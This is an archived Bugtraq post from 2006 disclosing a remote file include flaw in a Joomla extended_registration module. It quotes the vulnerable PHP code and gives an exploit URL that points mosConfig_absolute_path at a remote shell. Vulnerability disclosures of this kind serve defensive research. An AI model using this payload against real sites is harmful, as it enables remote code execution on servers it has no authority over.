Bugtraq mailing list archives
Joomla extended_registration mod Remote File Include Vulnerabilities
From: crackers_child () sibersavascilar com
Date: 26 Oct 2006 15:45:27 -0000
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!! -------------------------------------------------------------------------------- Title : Joomla extended_registration mod Remote File Include Vulnerabilities -------------------------------------------------------------------------------- #Author: Crackers_Child #cont@ct: crackers_child () sibersavascilar com -------------------------------------------------------------------------------- Bug in admin.extended_registration.php <?php require("../configuration.php"); function extended_registration_settings($state,$lang) { global $mosConfig_absolute_path; -------------------------------------------------------------------------------- Exploit: www.site.com/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=Shel3l? -------------------------------------------------------------------------------- greets: X_ALPEREN_X and All SiberSavascilar.CoM Members ! -------------------------------------------------------------------------------- --------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
Current thread:
- Joomla extended_registration mod Remote File Include Vulnerabilities crackers_child (Oct 27)